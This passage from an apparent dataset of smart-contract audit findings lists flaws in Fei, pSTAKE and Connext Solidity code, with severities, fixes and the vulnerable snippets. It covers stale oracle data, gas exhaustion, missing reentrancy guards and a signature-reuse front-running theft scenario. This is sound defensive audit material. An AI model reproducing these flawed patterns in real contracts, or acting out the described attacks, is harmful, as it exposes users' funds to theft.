`cachedProtocolControlledValue` has just been set to `_protocolControlledValue` a couple of lines before). `_isExceededDeviationThreshold` will, therefore, never detect a deviation and return `false´.\\nThere may currently be no incentive (e.g. from the keeper side) to call `update()` if the values are not outdated but they deviated too much from the target. However, anyone can force an update by calling the non-incentivized public `update()` method instead.\\n```\\n require(\\_validityStatus, ""CollateralizationOracleWrapper: CollateralizationOracle is invalid"");\\n\\n // set cache variables\\n cachedProtocolControlledValue = \\_protocolControlledValue;\\n cachedUserCirculatingFei = \\_userCirculatingFei;\\n cachedProtocolEquity = \\_protocolEquity;\\n\\n // reset time\\n \\_initTimed();\\n\\n // emit event\\n emit CachedValueUpdate(\\n msg.sender,\\n cachedProtocolControlledValue,\\n cachedUserCirculatingFei,\\n cachedProtocolEquity\\n );\\n\\n return outdated\\n || \\_isExceededDeviationThreshold(cachedProtocolControlledValue, \\_protocolControlledValue)\\n || \\_isExceededDeviationThreshold(cachedUserCirculatingFei, \\_userCirculatingFei);\\n}\\n```\\n","Add unit tests to check for all three return conditions (timed, deviationA, deviationB)\\nMake sure to compare the current to the stored value before updating the cached values when calling `_isExceededDeviationThreshold`.",,"```\\n require(\\_validityStatus, ""CollateralizationOracleWrapper: CollateralizationOracle is invalid"");\\n\\n // set cache variables\\n cachedProtocolControlledValue = \\_protocolControlledValue;\\n cachedUserCirculatingFei = \\_userCirculatingFei;\\n cachedProtocolEquity = \\_protocolEquity;\\n\\n // reset time\\n \\_initTimed();\\n\\n // emit event\\n emit CachedValueUpdate(\\n msg.sender,\\n cachedProtocolControlledValue,\\n cachedUserCirculatingFei,\\n cachedProtocolEquity\\n );\\n\\n return outdated\\n || \\_isExceededDeviationThreshold(cachedProtocolControlledValue, \\_protocolControlledValue)\\n || \\_isExceededDeviationThreshold(cachedUserCirculatingFei, \\_userCirculatingFei);\\n}\\n```\\n" +ChainlinkOracleWrapper - latestRoundData might return stale results,medium,"The oracle wrapper calls out to a chainlink oracle receiving the `latestRoundData()`. It then checks freshness by verifying that the answer is indeed for the last known round. The returned `updatedAt` timestamp is not checked.\\nIf there is a problem with chainlink starting a new round and finding consensus on the new value for the oracle (e.g. chainlink nodes abandon the oracle, chain congestion, vulnerability/attacks on the chainlink system) consumers of this contract may continue using outdated stale data (if oracles are unable to submit no new round is started)\\n```\\n/// @notice read the oracle price\\n/// @return oracle price\\n/// @return true if price is valid\\nfunction read() external view override returns (Decimal.D256 memory, bool) {\\n (uint80 roundId, int256 price,,, uint80 answeredInRound) = chainlinkOracle.latestRoundData();\\n bool valid = !paused() && price > 0 && answeredInRound == roundId;\\n\\n Decimal.D256 memory value = Decimal.from(uint256(price)).div(oracleDecimalsNormalizer);\\n return (value, valid);\\n}\\n```\\n\\n```\\n/// @notice determine if read value is stale\\n/// @return true if read value is stale\\nfunction isOutdated() external view override returns (bool) {\\n (uint80 roundId,,,, uint80 answeredInRound) = chainlinkOracle.latestRoundData();\\n return answeredInRound != roundId;\\n}\\n```\\n",Consider checking the oracle responses `updatedAt` value after calling out to `chainlinkOracle.latestRoundData()` verifying that the result is within an allowed margin of freshness.,,"```\\n/// @notice read the oracle price\\n/// @return oracle price\\n/// @return true if price is valid\\nfunction read() external view override returns (Decimal.D256 memory, bool) {\\n (uint80 roundId, int256 price,,, uint80 answeredInRound) = chainlinkOracle.latestRoundData();\\n bool valid = !paused() && price > 0 && answeredInRound == roundId;\\n\\n Decimal.D256 memory value = Decimal.from(uint256(price)).div(oracleDecimalsNormalizer);\\n return (value, valid);\\n}\\n```\\n" +CollateralizationOracle - missing events and incomplete event information,low,"The `CollateralizationOracle.setDepositExclusion` function is used to exclude and re-include deposits from collateralization calculations. Unlike the other state-changing functions in this contract, it doesn't emit an event to inform about the exclusion or re-inclusion.\\n```\\nfunction setDepositExclusion(address \\_deposit, bool \\_excluded) external onlyGuardianOrGovernor {\\n excludedDeposits[\\_deposit] = \\_excluded;\\n}\\n```\\n\\nThe `DepositAdd` event emits not only the deposit address but also the deposit's token. Despite the symmetry, the `DepositRemove` event does not emit the token.\\n```\\nevent DepositAdd(address from, address indexed deposit, address indexed token);\\nevent DepositRemove(address from, address indexed deposit);\\n```\\n","`setDepositInclusion` should emit an event that informs about the deposit and whether it was included or excluded.\\nFor symmetry reasons and because it is indeed useful information, the `DepositRemove` event could include the deposit's token.",,"```\\nfunction setDepositExclusion(address \\_deposit, bool \\_excluded) external onlyGuardianOrGovernor {\\n excludedDeposits[\\_deposit] = \\_excluded;\\n}\\n```\\n" +RateLimited - Contract starts with a full buffer at deployment,low,A contract that inherits from `RateLimited` starts out with a full buffer when it is deployed.\\n```\\n\\_bufferStored = \\_bufferCap;\\n```\\n\\nThat means the full `bufferCap` is immediately available after deployment; it doesn't have to be built up over time. This behavior might be unexpected.,"We recommend starting with an empty buffer, or - if there are valid reasons for the current implementation - at least document it clearly.",,```\\n\\_bufferStored = \\_bufferCap;\\n```\\n +BalancerLBPSwapper - tokenSpent and tokenReceived should be immutable,low,Acc. to the inline comment both `tokenSpent` and `tokenReceived` should be immutable but they are not declared as such.\\n```\\n// tokenSpent and tokenReceived are immutable\\ntokenSpent = \\_tokenSpent;\\ntokenReceived = \\_tokenReceived;\\n```\\n\\n```\\n/// @notice the token to be auctioned\\naddress public override tokenSpent;\\n\\n/// @notice the token to buy\\naddress public override tokenReceived;\\n```\\n,Declare both variable `immutable`.,,```\\n// tokenSpent and tokenReceived are immutable\\ntokenSpent = \\_tokenSpent;\\ntokenReceived = \\_tokenReceived;\\n```\\n +CollateralizationOracle - potentially unsafe casts,low,"`protocolControlledValue` is the cumulative USD token value of all tokens in the PCV. The USD value is determined using external chainlink oracles. To mitigate some effects of attacks on chainlink to propagate to this protocol it is recommended to implement a defensive approach to handling values derived from the external source. Arithm. overflows are checked by the compiler (0.8.4), however, it does not guarantee safe casting from unsigned to signed integer. The scenario of this happening might be rather unlikely, however, there is no guarantee that the external price-feed is not taken over by malicious actors and this is when every line of defense counts.\\n```\\n//solidity 0.8.7\\n » int(uint(2\\*\\*255))\\n-57896044618658097711785492504343953926634992332820282019728792003956564819968\\n » int(uint(2\\*\\*255-2))\\n57896044618658097711785492504343953926634992332820282019728792003956564819966\\n```\\n\\n```\\nprotocolEquity = int256(protocolControlledValue) - int256(userCirculatingFei);\\n```\\n\\n```\\nprotocolControlledValue += \\_oraclePrice.mul(\\_totalTokenBalance).asUint256();\\n```\\n",Perform overflow checked SafeCast as another line of defense against oracle manipulation.,,```\\n//solidity 0.8.7\\n » int(uint(2\\*\\*255))\\n-57896044618658097711785492504343953926634992332820282019728792003956564819968\\n » int(uint(2\\*\\*255-2))\\n57896044618658097711785492504343953926634992332820282019728792003956564819966\\n```\\n +FeiTimedMinter - constructor does not enforce the same boundaries as setter for frequency,low,"The setter method for `frequency` enforced upper and lower bounds while the constructor does not. Users cannot trust that the `frequency` is actually set to be within bounds on deployment.\\n```\\nconstructor(\\n address \\_core,\\n address \\_target,\\n uint256 \\_incentive,\\n uint256 \\_frequency,\\n uint256 \\_initialMintAmount\\n)\\n CoreRef(\\_core)\\n Timed(\\_frequency)\\n Incentivized(\\_incentive)\\n RateLimitedMinter((\\_initialMintAmount + \\_incentive) / \\_frequency, (\\_initialMintAmount + \\_incentive), true)\\n{\\n \\_initTimed();\\n\\n \\_setTarget(\\_target);\\n \\_setMintAmount(\\_initialMintAmount);\\n}\\n```\\n\\n```\\nfunction setFrequency(uint256 newFrequency) external override onlyGovernorOrAdmin {\\n require(newFrequency >= MIN\\_MINT\\_FREQUENCY, ""FeiTimedMinter: frequency low"");\\n require(newFrequency <= MAX\\_MINT\\_FREQUENCY, ""FeiTimedMinter: frequency high"");\\n\\n \\_setDuration(newFrequency);\\n}\\n```\\n",Perform the same checks on `frequency` in the constructor as in the `setFrequency` method.\\nThis contract is also inherited by a range of contracts that might specify different boundaries to what is hardcoded in the `FeiTimedMinter`. A way to enforce bounds-checks could be to allow overriding the setter method and using the setter in the constructor as well ensuring that bounds are also checked on deployment.,,"```\\nconstructor(\\n address \\_core,\\n address \\_target,\\n uint256 \\_incentive,\\n uint256 \\_frequency,\\n uint256 \\_initialMintAmount\\n)\\n CoreRef(\\_core)\\n Timed(\\_frequency)\\n Incentivized(\\_incentive)\\n RateLimitedMinter((\\_initialMintAmount + \\_incentive) / \\_frequency, (\\_initialMintAmount + \\_incentive), true)\\n{\\n \\_initTimed();\\n\\n \\_setTarget(\\_target);\\n \\_setMintAmount(\\_initialMintAmount);\\n}\\n```\\n" +CollateralizationOracle - swapDeposit should call internal functions to remove/add deposits,low,"Instead of calling `removeDeposit` and `addDeposit`, `swapDeposit` should call its internal sister functions `_removeDeposit` and `_addDeposit` to avoid running the `onlyGovernor` checks multiple times.\\n```\\n/// @notice Swap a PCVDeposit with a new one, for instance when a new version\\n/// of a deposit (holding the same token) is deployed.\\n/// @param \\_oldDeposit : the PCVDeposit to remove from the list.\\n/// @param \\_newDeposit : the PCVDeposit to add to the list.\\nfunction swapDeposit(address \\_oldDeposit, address \\_newDeposit) external onlyGovernor {\\n removeDeposit(\\_oldDeposit);\\n addDeposit(\\_newDeposit);\\n}\\n```\\n",Call the internal functions instead. addDeposit's and removeDeposit's visibility can then be changed from `public` to `external`.,,"```\\n/// @notice Swap a PCVDeposit with a new one, for instance when a new version\\n/// of a deposit (holding the same token) is deployed.\\n/// @param \\_oldDeposit : the PCVDeposit to remove from the list.\\n/// @param \\_newDeposit : the PCVDeposit to add to the list.\\nfunction swapDeposit(address \\_oldDeposit, address \\_newDeposit) external onlyGovernor {\\n removeDeposit(\\_oldDeposit);\\n addDeposit(\\_newDeposit);\\n}\\n```\\n" +CollateralizationOracle - misleading comments,low,"According to an inline comment in `isOvercollateralized`, the validity status of `pcvStats` is ignored, while it is actually being checked.\\nSimilarly, a comment in `pcvStats` mentions that the returned `protocolEquity` is 0 if there is less PCV than circulating FEI, while in reality, `pcvStats` always returns the difference between the former and the latter, even if it is negative.\\n```\\n/// Controlled Value) than the circulating (user-owned) FEI, i.e.\\n/// a positive Protocol Equity.\\n/// Note: the validity status is ignored in this function.\\nfunction isOvercollateralized() external override view whenNotPaused returns (bool) {\\n (,, int256 \\_protocolEquity, bool \\_valid) = pcvStats();\\n require(\\_valid, ""CollateralizationOracle: reading is invalid"");\\n return \\_protocolEquity > 0;\\n}\\n```\\n\\n```\\n/// @return protocolEquity : the difference between PCV and user circulating FEI.\\n/// If there are more circulating FEI than $ in the PCV, equity is 0.\\n```\\n\\n```\\nprotocolEquity = int256(protocolControlledValue) - int256(userCirculatingFei);\\n```\\n",Revise the comments.,,"```\\n/// Controlled Value) than the circulating (user-owned) FEI, i.e.\\n/// a positive Protocol Equity.\\n/// Note: the validity status is ignored in this function.\\nfunction isOvercollateralized() external override view whenNotPaused returns (bool) {\\n (,, int256 \\_protocolEquity, bool \\_valid) = pcvStats();\\n require(\\_valid, ""CollateralizationOracle: reading is invalid"");\\n return \\_protocolEquity > 0;\\n}\\n```\\n" +The withdrawUnstakedTokens may run out of gas,high,"The `withdrawUnstakedTokens` is iterating over all batches of unstaked tokens. One user, if unstaked many times, could get their tokens stuck in the contract.\\n```\\nfunction withdrawUnstakedTokens(address staker)\\n public\\n virtual\\n override\\n whenNotPaused\\n{\\n require(staker == \\_msgSender(), ""LQ20"");\\n uint256 \\_withdrawBalance;\\n uint256 \\_unstakingExpirationLength = \\_unstakingExpiration[staker]\\n .length;\\n uint256 \\_counter = \\_withdrawCounters[staker];\\n for (\\n uint256 i = \\_counter;\\n i < \\_unstakingExpirationLength;\\n i = i.add(1)\\n ) {\\n //get getUnstakeTime and compare it with current timestamp to check if 21 days + epoch difference has passed\\n (uint256 \\_getUnstakeTime, , ) = getUnstakeTime(\\n \\_unstakingExpiration[staker][i]\\n );\\n if (block.timestamp >= \\_getUnstakeTime) {\\n //if 21 days + epoch difference has passed, then add the balance and then mint uTokens\\n \\_withdrawBalance = \\_withdrawBalance.add(\\n \\_unstakingAmount[staker][i]\\n );\\n \\_unstakingExpiration[staker][i] = 0;\\n \\_unstakingAmount[staker][i] = 0;\\n \\_withdrawCounters[staker] = \\_withdrawCounters[staker].add(1);\\n }\\n }\\n\\n require(\\_withdrawBalance > 0, ""LQ21"");\\n emit WithdrawUnstakeTokens(staker, \\_withdrawBalance, block.timestamp);\\n \\_uTokens.mint(staker, \\_withdrawBalance);\\n}\\n```\\n","Resolution\\nComment from pSTAKE Finance team:\\nHave implemented a batchingLimit variable which enforces a definite number of iterations during withdrawal of unstaked tokens, instead of indefinite iterations.\\nLimit the number of processed unstaked batches, and possibly add pagination.",,"```\\nfunction withdrawUnstakedTokens(address staker)\\n public\\n virtual\\n override\\n whenNotPaused\\n{\\n require(staker == \\_msgSender(), ""LQ20"");\\n uint256 \\_withdrawBalance;\\n uint256 \\_unstakingExpirationLength = \\_unstakingExpiration[staker]\\n .length;\\n uint256 \\_counter = \\_withdrawCounters[staker];\\n for (\\n uint256 i = \\_counter;\\n i < \\_unstakingExpirationLength;\\n i = i.add(1)\\n ) {\\n //get getUnstakeTime and compare it with current timestamp to check if 21 days + epoch difference has passed\\n (uint256 \\_getUnstakeTime, , ) = getUnstakeTime(\\n \\_unstakingExpiration[staker][i]\\n );\\n if (block.timestamp >= \\_getUnstakeTime) {\\n //if 21 days + epoch difference has passed, then add the balance and then mint uTokens\\n \\_withdrawBalance = \\_withdrawBalance.add(\\n \\_unstakingAmount[staker][i]\\n );\\n \\_unstakingExpiration[staker][i] = 0;\\n \\_unstakingAmount[staker][i] = 0;\\n \\_withdrawCounters[staker] = \\_withdrawCounters[staker].add(1);\\n }\\n }\\n\\n require(\\_withdrawBalance > 0, ""LQ21"");\\n emit WithdrawUnstakeTokens(staker, \\_withdrawBalance, block.timestamp);\\n \\_uTokens.mint(staker, \\_withdrawBalance);\\n}\\n```\\n" +The _calculatePendingRewards can run out of gas,medium,"The reward rate in STokens can be changed, and the history of these changes are stored in the contract:\\n```\\nfunction setRewardRate(uint256 rewardRate)\\n public\\n virtual\\n override\\n returns (bool success)\\n{\\n // range checks for rewardRate. Since rewardRate cannot be more than 100%, the max cap\\n // is \\_valueDivisor \\* 100, which then brings the fees to 100 (percentage)\\n require(rewardRate <= \\_valueDivisor.mul(100), ""ST17"");\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), ""ST2"");\\n \\_rewardRate.push(rewardRate);\\n \\_lastMovingRewardTimestamp.push(block.timestamp);\\n emit SetRewardRate(rewardRate);\\n\\n return true;\\n}\\n```\\n\\nWhen the reward is calculated `for` each user, all changes of the `_rewardRate` are considered. So there is a `for` loop that iterates over all changes since the last reward update. If the reward rate was changed many times, the `_calculatePendingRewards` function could run out of gas.","Provide an option to partially update the reward, so the full update can be split in multiple transactions.",,"```\\nfunction setRewardRate(uint256 rewardRate)\\n public\\n virtual\\n override\\n returns (bool success)\\n{\\n // range checks for rewardRate. Since rewardRate cannot be more than 100%, the max cap\\n // is \\_valueDivisor \\* 100, which then brings the fees to 100 (percentage)\\n require(rewardRate <= \\_valueDivisor.mul(100), ""ST17"");\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), ""ST2"");\\n \\_rewardRate.push(rewardRate);\\n \\_lastMovingRewardTimestamp.push(block.timestamp);\\n emit SetRewardRate(rewardRate);\\n\\n return true;\\n}\\n```\\n" +The calculateRewards should not be callable by the whitelisted contract,medium,"The `calculateRewards` function should only be called for non-whitelisted addresses:\\n```\\nfunction calculateRewards(address to)\\n public\\n virtual\\n override\\n whenNotPaused\\n returns (bool success)\\n{\\n require(to == \\_msgSender(), ""ST5"");\\n uint256 reward = \\_calculateRewards(to);\\n emit TriggeredCalculateRewards(to, reward, block.timestamp);\\n return true;\\n}\\n```\\n\\nFor all the whitelisted addresses, the `calculateHolderRewards` function is called. But if the `calculateRewards` function is called by the whitelisted address directly, the function will execute, and the rewards will be distributed to the caller instead of the intended recipients.","Resolution\\nComment from pSTAKE Finance team:\\nHave created a require condition in Smart Contract code to disallow whitelisted contracts from calling the function\\nWhile this scenario is unlikely to happen, adding the additional check in the `calculateRewards` is a good option.",,"```\\nfunction calculateRewards(address to)\\n public\\n virtual\\n override\\n whenNotPaused\\n returns (bool success)\\n{\\n require(to == \\_msgSender(), ""ST5"");\\n uint256 reward = \\_calculateRewards(to);\\n emit TriggeredCalculateRewards(to, reward, block.timestamp);\\n return true;\\n}\\n```\\n" +Presence of testnet code,medium,"Based on the discussions with pStake team and in-line comments, there are a few instances of code and commented code in the code base under audit that are not finalized for mainnet deployment.\\n```\\nfunction initialize(address pauserAddress) public virtual initializer {\\n \\_\\_ERC20\\_init(""pSTAKE Token"", ""PSTAKE"");\\n \\_\\_AccessControl\\_init();\\n \\_\\_Pausable\\_init();\\n \\_setupRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender());\\n \\_setupRole(PAUSER\\_ROLE, pauserAddress);\\n // PSTAKE IS A SIMPLE ERC20 TOKEN HENCE 18 DECIMAL PLACES\\n \\_setupDecimals(18);\\n // pre-allocate some tokens to an admin address which will air drop PSTAKE tokens\\n // to each of holder contracts. This is only for testnet purpose. in Mainnet, we\\n // will use a vesting contract to allocate tokens to admin in a certain schedule\\n \\_mint(\\_msgSender(), 5000000000000000000000000);\\n}\\n```\\n\\nThe initialize function currently mints all the tokens to msg.sender, however the goal for mainnet is to use a vesting contract which is not present in the current code.",It is recommended to fully test the final code before deployment to the mainnet.,,"```\\nfunction initialize(address pauserAddress) public virtual initializer {\\n \\_\\_ERC20\\_init(""pSTAKE Token"", ""PSTAKE"");\\n \\_\\_AccessControl\\_init();\\n \\_\\_Pausable\\_init();\\n \\_setupRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender());\\n \\_setupRole(PAUSER\\_ROLE, pauserAddress);\\n // PSTAKE IS A SIMPLE ERC20 TOKEN HENCE 18 DECIMAL PLACES\\n \\_setupDecimals(18);\\n // pre-allocate some tokens to an admin address which will air drop PSTAKE tokens\\n // to each of holder contracts. This is only for testnet purpose. in Mainnet, we\\n // will use a vesting contract to allocate tokens to admin in a certain schedule\\n \\_mint(\\_msgSender(), 5000000000000000000000000);\\n}\\n```\\n" +Sanity check on all important variables,low,"Most of the functionalities have proper sanity checks when it comes to setting system-wide variables, such as whitelist addresses. However there are a few key setters that lack such sanity checks.\\nSanity check (!= address(0)) on all token contracts.\\n```\\nfunction setUTokensContract(address uAddress) public virtual override {\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), ""LP9"");\\n \\_uTokens = IUTokens(uAddress);\\n emit SetUTokensContract(uAddress);\\n}\\n\\n/\\*\\*\\n \\* @dev Set 'contract address', called from constructor\\n \\* @param sAddress: stoken contract address\\n \\*\\n \\* Emits a {SetSTokensContract} event with '\\_contract' set to the stoken contract address.\\n \\*\\n \\*/\\nfunction setSTokensContract(address sAddress) public virtual override {\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), ""LP10"");\\n \\_sTokens = ISTokens(sAddress);\\n emit SetSTokensContract(sAddress);\\n}\\n\\n/\\*\\*\\n \\* @dev Set 'contract address', called from constructor\\n \\* @param pstakeAddress: pStake contract address\\n \\*\\n \\* Emits a {SetPSTAKEContract} event with '\\_contract' set to the stoken contract address.\\n \\*\\n \\*/\\nfunction setPSTAKEContract(address pstakeAddress) public virtual override {\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), ""LP11"");\\n \\_pstakeTokens = IPSTAKE(pstakeAddress);\\n emit SetPSTAKEContract(pstakeAddress);\\n}\\n```\\n\\nSanity check on `unstakingLockTime` to be in the acceptable range (21 hours to 21 days)\\n```\\n/\\*\\*\\n \\* @dev Set 'unstake props', called from admin\\n \\* @param unstakingLockTime: varies from 21 hours to 21 days\\n \\*\\n \\* Emits a {SetUnstakeProps} event with 'fee' set to the stake and unstake.\\n \\*\\n \\*/\\nfunction setUnstakingLockTime(uint256 unstakingLockTime)\\n public\\n virtual\\n returns (bool success)\\n{\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), ""LQ3"");\\n \\_unstakingLockTime = unstakingLockTime;\\n emit SetUnstakingLockTime(unstakingLockTime);\\n return true;\\n}\\n```\\n","Resolution\\nComment from pSTAKE Finance team:\\nPost the implementation of new emission logic there have been a rearrangement of some variables, but the rest have been sanity tested and corrected",,"```\\nfunction setUTokensContract(address uAddress) public virtual override {\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), ""LP9"");\\n \\_uTokens = IUTokens(uAddress);\\n emit SetUTokensContract(uAddress);\\n}\\n\\n/\\*\\*\\n \\* @dev Set 'contract address', called from constructor\\n \\* @param sAddress: stoken contract address\\n \\*\\n \\* Emits a {SetSTokensContract} event with '\\_contract' set to the stoken contract address.\\n \\*\\n \\*/\\nfunction setSTokensContract(address sAddress) public virtual override {\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), ""LP10"");\\n \\_sTokens = ISTokens(sAddress);\\n emit SetSTokensContract(sAddress);\\n}\\n\\n/\\*\\*\\n \\* @dev Set 'contract address', called from constructor\\n \\* @param pstakeAddress: pStake contract address\\n \\*\\n \\* Emits a {SetPSTAKEContract} event with '\\_contract' set to the stoken contract address.\\n \\*\\n \\*/\\nfunction setPSTAKEContract(address pstakeAddress) public virtual override {\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), ""LP11"");\\n \\_pstakeTokens = IPSTAKE(pstakeAddress);\\n emit SetPSTAKEContract(pstakeAddress);\\n}\\n```\\n" +TransactionManager - Receiver-side check also on sending side Fix,high,"The functions `prepare`, `cancel`, and `fulfill` in the `TransactionManager` all have a “common part” that is executed on both the sending and the receiving chain and side-specific parts that are only executed either on the sending or on the receiving side.\\nThe following lines occur in fulfill's common part, but this should only be checked on the receiving chain. In fact, on the sending chain, we might even compare amounts of different assets.\\n```\\n// Sanity check: fee <= amount. Allow `=` in case of only wanting to execute\\n// 0-value crosschain tx, so only providing the fee amount\\nrequire(relayerFee <= txData.amount, ""#F:023"");\\n```\\n\\nThis could prevent a legitimate `fulfill` on the sending chain, causing a loss of funds for the router.","Resolution\\nThe Connext team claims to have fixed this in commit `4adbfd52703441ee5de655130fc2e0252eae4661`. We have not reviewed this commit or, generally, the codebase at this point.\\nMove these lines to the receiving-side part.\\nRemark\\nThe `callData` supplied to `fulfill` is not used at all on the sending chain, but the check whether its hash matches `txData.callDataHash` happens in the common part.\\n```\\n// Check provided callData matches stored hash\\nrequire(keccak256(callData) == txData.callDataHash, ""#F:024"");\\n```\\n\\nIn principle, this check could also be moved to the receiving-chain part, allowing the router to save some gas by calling sending-side `fulfill` with empty `callData` and skip the check. Note, however, that the `TransactionFulfilled` event will then also emit the “wrong” `callData` on the sending chain, so the off-chain code has to be able to deal with that if you want to employ this optimization.",,"```\\n// Sanity check: fee <= amount. Allow `=` in case of only wanting to execute\\n// 0-value crosschain tx, so only providing the fee amount\\nrequire(relayerFee <= txData.amount, ""#F:023"");\\n```\\n" +TransactionManager - Missing nonReentrant modifier on removeLiquidity,medium,"Resolution\\nThis issue has been fixed.\\nThe `removeLiquidity` function does not have a `nonReentrant` modifier.\\n```\\n/\\*\\*\\n \\* @notice This is used by any router to decrease their available\\n \\* liquidity for a given asset.\\n \\* @param shares The amount of liquidity to remove for the router in shares\\n \\* @param assetId The address (or `address(0)` if native asset) of the\\n \\* asset you're removing liquidity for\\n \\* @param recipient The address that will receive the liquidity being removed\\n \\*/\\nfunction removeLiquidity(\\n uint256 shares,\\n address assetId,\\n address payable recipient\\n) external override {\\n // Sanity check: recipient is sensible\\n require(recipient != address(0), ""#RL:007"");\\n\\n // Sanity check: nonzero shares\\n require(shares > 0, ""#RL:035"");\\n\\n // Get stored router shares\\n uint256 routerShares = issuedShares[msg.sender][assetId];\\n\\n // Get stored outstanding shares\\n uint256 outstanding = outstandingShares[assetId];\\n\\n // Sanity check: owns enough shares\\n require(routerShares >= shares, ""#RL:018"");\\n\\n // Convert shares to amount\\n uint256 amount = getAmountFromIssuedShares(\\n shares,\\n outstanding,\\n Asset.getOwnBalance(assetId)\\n );\\n\\n // Update router issued shares\\n // NOTE: unchecked due to require above\\n unchecked {\\n issuedShares[msg.sender][assetId] = routerShares - shares;\\n }\\n\\n // Update the total shares for asset\\n outstandingShares[assetId] = outstanding - shares;\\n\\n // Transfer from contract to specified recipient\\n Asset.transferAsset(assetId, recipient, amount);\\n\\n // Emit event\\n emit LiquidityRemoved(\\n msg.sender,\\n assetId,\\n shares,\\n amount,\\n recipient\\n );\\n}\\n```\\n\\nAssuming we're dealing with a token contract that allows execution of third-party-supplied code, that means it is possible to leave the `TransactionManager` contract in one of the functions that call into the token contract and then reenter via `removeLiquidity`. Alternatively, we can leave the contract in `removeLiquidity` and reenter through an arbitrary external function, even if it has a `nonReentrant` modifier.\\nExample\\nAssume a token contract allows the execution of third-party-supplied code in its `transfer` function before the actual balance change takes place. If a router calls `removeLiquidity` with half of their shares and then, in a reentering `removeLiquidity` call, supplies the other half of their shares, they will receive more tokens than if they had liquidated all their shares at once because the reentering call occurs after the (first half of the) shares have been burnt but before the corresponding amount of tokens has actually been transferred out of the contract, leading to an artificially increased share value in the reentering call. Similarly, reentering the contract with a `fulfill` call on the receiving chain instead of a second `removeLiquidity` would `transfer` too many tokens to the recipient due to the artificially inflated share value.","While tokens that behave as described in the example might be rare or not exist at all, caution is advised when integrating with unknown tokens or calling untrusted code in general. We strongly recommend adding a `nonReentrant` modifier to `removeLiquidity`.",,"```\\n/\\*\\*\\n \\* @notice This is used by any router to decrease their available\\n \\* liquidity for a given asset.\\n \\* @param shares The amount of liquidity to remove for the router in shares\\n \\* @param assetId The address (or `address(0)` if native asset) of the\\n \\* asset you're removing liquidity for\\n \\* @param recipient The address that will receive the liquidity being removed\\n \\*/\\nfunction removeLiquidity(\\n uint256 shares,\\n address assetId,\\n address payable recipient\\n) external override {\\n // Sanity check: recipient is sensible\\n require(recipient != address(0), ""#RL:007"");\\n\\n // Sanity check: nonzero shares\\n require(shares > 0, ""#RL:035"");\\n\\n // Get stored router shares\\n uint256 routerShares = issuedShares[msg.sender][assetId];\\n\\n // Get stored outstanding shares\\n uint256 outstanding = outstandingShares[assetId];\\n\\n // Sanity check: owns enough shares\\n require(routerShares >= shares, ""#RL:018"");\\n\\n // Convert shares to amount\\n uint256 amount = getAmountFromIssuedShares(\\n shares,\\n outstanding,\\n Asset.getOwnBalance(assetId)\\n );\\n\\n // Update router issued shares\\n // NOTE: unchecked due to require above\\n unchecked {\\n issuedShares[msg.sender][assetId] = routerShares - shares;\\n }\\n\\n // Update the total shares for asset\\n outstandingShares[assetId] = outstanding - shares;\\n\\n // Transfer from contract to specified recipient\\n Asset.transferAsset(assetId, recipient, amount);\\n\\n // Emit event\\n emit LiquidityRemoved(\\n msg.sender,\\n assetId,\\n shares,\\n amount,\\n recipient\\n );\\n}\\n```\\n" +TransactionManager - Relayer may use user's cancel after expiry signature to steal user's funds by colluding with a router Acknowledged,medium,"Users that are willing to have a lower trust dependency on a relayer should have the ability to opt-in only for the service that allows the relayer to withdraw back users' funds from the sending chain after expiry. However, in practice, a user is forced to opt-in for the service that refunds the router before the expiry, since the same signature is used for both services (lines 795,817 use the same signature).\\nLet's consider the case of a user willing to call `fulfill` on his own, but to use the relayer only to withdraw back his funds from the sending chain after expiry. In this case, the relayer can collude with the router and use the user's `cancel` signature (meant for withdrawing his only after expiry) as a front-running transaction for a user call to `fulfill`. This way the router will be able to withdraw both his funds and the user's funds since the user's `fulfill` signature is now public data residing in the mem-pool.\\n```\\n require(msg.sender == txData.user || recoverSignature(txData.transactionId, relayerFee, ""cancel"", signature) == txData.user, ""#C:022"");\\n\\n Asset.transferAsset(txData.sendingAssetId, payable(msg.sender), relayerFee);\\n }\\n\\n // Get the amount to refund the user\\n uint256 toRefund;\\n unchecked {\\n toRefund = amount - relayerFee;\\n }\\n\\n // Return locked funds to sending chain fallback\\n if (toRefund > 0) {\\n Asset.transferAsset(txData.sendingAssetId, payable(txData.sendingChainFallback), toRefund);\\n }\\n }\\n\\n} else {\\n // Receiver side, router liquidity is returned\\n if (txData.expiry >= block.timestamp) {\\n // Timeout has not expired and tx may only be cancelled by user\\n // Validate signature\\n require(msg.sender == txData.user || recoverSignature(txData.transactionId, relayerFee, ""cancel"", signature) == txData.user, ""#C:022"");\\n```\\n","The crucial point here is that the user must never sign a “cancel” that could be used on the receiving chain while fulfillment on the sending chain is still a possibility.\\nOr, to put it differently: A user may only sign a “cancel” that is valid on the receiving chain after sending-chain expiry or if they never have and won't ever sign a “fulfill” (or at least won't sign until sending-chain expiry — but it is pointless to sign a “fulfill” after that, so “never” is a reasonable simplification).\\nOr, finally, a more symmetric perspective on this requirement: If a user has signed “fulfill”, they must not sign a receiving-chain-valid “cancel” until sending-chain expiry, and if they have signed a receiving-chain-valid “cancel”, they must not sign a “fulfill” (until sending-chain expiry).\\nIn this sense, “cancel” signatures that are valid on the receiving chain are dangerous, while sending-side cancellations are not. So the principle stated in the previous paragraph might be easier to follow with different signatures for sending- and receiving-chain cancellations.",,"```\\n require(msg.sender == txData.user || recoverSignature(txData.transactionId, relayerFee, ""cancel"", signature) == txData.user, ""#C:022"");\\n\\n Asset.transferAsset(txData.sendingAssetId, payable(msg.sender), relayerFee);\\n }\\n\\n // Get the amount to refund the user\\n uint256 toRefund;\\n unchecked {\\n toRefund = amount - relayerFee;\\n }\\n\\n // Return locked funds to sending chain fallback\\n if (toRefund > 0) {\\n Asset.transferAsset(txData.sendingAssetId, payable(txData.sendingChainFallback), toRefund);\\n }\\n }\\n\\n} else {\\n // Receiver side, router liquidity is returned\\n if 